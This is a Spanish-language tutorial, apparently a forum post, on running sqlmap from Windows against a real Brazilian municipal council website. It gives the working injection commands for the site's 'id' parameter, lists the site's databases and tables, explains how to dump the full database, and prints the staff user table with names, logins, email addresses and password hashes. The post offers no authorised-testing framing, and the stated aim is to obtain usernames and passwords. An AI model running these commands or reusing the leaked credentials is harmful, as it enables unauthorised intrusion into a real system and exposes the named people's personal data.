vamos hacer una inyeccion SQLMAP desde Windows
lo primero que vamos hacer es descargar las herramientas trabajar en windows
python
download
sqlmap
download
despues que descargamos sqlmap lo buscamos y lo ponemos en la unidada C:
despues que esta en la carpeta le cambiamos el nombre para que sea mas facil le ponemos sqlmap
vamos a Inicio y escribimos CMD
escribimos cd/sqlmap
ahora ponemos
C:\sqlmap>sqlmap.py -u http://www.camaralages.sc.gov.br/informativos/index/?id=42 --dbs
nos sale este mensaje le damos que no porque el paramento es vulne no queremos que busque mas
[20:47:23] [INFO] target URL appears to have 4 columns in query
[20:47:28] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 colu
mns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] n
sqlmap identified the following injection points with a total of 46 HTTP(s) requ
ests:
como vemos nos muestra dos base de dato
entonce lo que tenemos que hacer es seguir la guia poniendo unas de las dos tablas que seria haci
[*] camaralages
[*] information_schema
sqlmap.py -u http://www.camaralages.sc.gov.br/informativos/index/?id=42 -D camaralages --tables
Database: camaralages
[35 tables]
+--------------------------+
| banner_popup |
| biblioteca |
| bibliotecagaleria |
| bloquei |
| camara |
| camaragaleria |
| escolalegislativo |
| escolalegislativogaleria |
| espaco |
| espacogaleria |
| historico |
| historico_login |
| informativo |
| j_vereador |
| j_vereador_galeria |
| jovem_vereador |
| licitacao |
| licitacao_documento |
| memorias |
| memoriasgaleria |
| museu |
| museugaleria |
| noticia |
| noticia_comentario |
| noticiagaleria |
| radio |
| radioprogramacao |
| radiotexto |
| tv |
| tvprogramacao |
| tvtexto |
| usuario |
| vereadores |
| vereadores_comissao |
| vereadores_mesa |
+--------------------------+
[21:19:33] [INFO] fetched data logged to text files under 'C:\Users\tempo\.sqlma
p\output\www.camaralages.sc.gov.br'
C:\sqlmap> como vemos nos acaba de mostrar todas su tables buscamos la que nos interesa
oh si quieren descargarce toda la base de data entonce hacemos haci
sqlmap.py -u http://www.camaralages.sc.gov.br/informativos/index/?id=42 -D camaralages --dump >data.txt escaneara todo y se guardara en un archivo txt en la unidad C:\sqlmap
oh empecemos desde cero buscamos en la tables lo que deceamos buscar que es el username y password que viene siendo
sqlmap.py -u http://www.camaralages.sc.gov.br/informativos/index/?id=4 -D camaralages -T usuario --dump
Database: camaralages
Table: usuario
[5 entries]
+------------+----------------+-------+----------------------------------+------
----------------+----------------------------------+----------------------------
------+
| id_usuario | nome | nivel | senha | login
| email | imagem
|
+------------+----------------+-------+----------------------------------+------
----------------+----------------------------------+----------------------------
------+
| 9 | Flaviano | 1 | da561088d345f16db12379e329e8924c | flavi
ano@camaralages | flaviano@camaralages.sc.gov.br | <blank>
|
| 12 | Everton | 1 | 711536710706e16920b980bd563c1d61 | evert
on@camaralages | everton@camaralages.sc.gov.br | <blank>
|
| 13 | Maurício Pezzi | 4 | 711536710706e16920b980bd563c1d61 | mauri
cio@camaralages | mauricio@camaralages.sc.gov.br | /capa/050814140725722614072
57226 |
| 14 | Janelize | 1 | 856abed2aad7c14e8ab1904c7babee3e | lize
| lizeborges@camaralages.sc.gov.br | /capa/050814140726421314072
64213 |
| 15 | Flavia Mota | 1 | 711536710706e16920b980bd563c1d61 | flavi
a | flavia@camaralages.sc.gov.br | /capa/050814140726427114072
64271 |
+------------+----------------+-------+----------------------------------+------
----------------+----------------------------------+----------------------------
------+
sqlmap.py -u http://www.camaralages.sc.gov.br/informativos/index/?id=4 -D camaralages -T usuario --columns
